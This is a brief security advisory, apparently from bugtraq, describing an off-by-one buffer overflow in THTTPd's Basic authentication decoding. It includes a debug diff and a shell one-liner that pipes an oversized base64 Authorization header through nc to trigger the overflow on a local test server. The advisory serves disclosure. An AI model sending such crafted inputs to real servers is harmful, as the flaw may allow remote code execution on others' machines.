|
|
|
|
| |
| THTTPd is a simple, small, portable, fast, and secure HTTP server. A buffer overflow in the product may enable remote users to run arbitrary code on the machine. |
| |
Credit:
The information has been provided by bugtraq.
|
| |
Demonstration:
1) Apply the following diff:
--- libhttpd.c Tue Nov 20 14:50:00 2001
+++ libhttpd-new.c Tue Nov 20 14:22:12 2001
@@ -886,6 +886,7 @@
/* Decode it. */
l = b64_decode( &(hc->authorization[6]), authinfo, sizeof(authinfo) );
authinfo[l] = '\0';
+ printf("%02x\n", authinfo[499]);
/* Split into user and password. */
authpass = strchr( authinfo, ':' );
if ( authpass == (char*) 0 )
This allows us to see what the final element in the array ends up to be.
2) Build, and then:
[terminal 1]
$ mkdir test
$ echo "joe:blow" > test/.htpasswd
$ ./thttpd -D -p 7777
[terminal 2]
(printf "GET /test/ HTTP/1.0\r\nAuthorization: Basic " ; printf `perl -e 'print "A"x550'` | openssl enc -base64 -e -in /dev/stdin ; printf "\r\n\r\n") | nc 0 7777
[terminal 1]
We see '41'. This means an 'off-by-one' overflow is present.
|
|
|
|
|
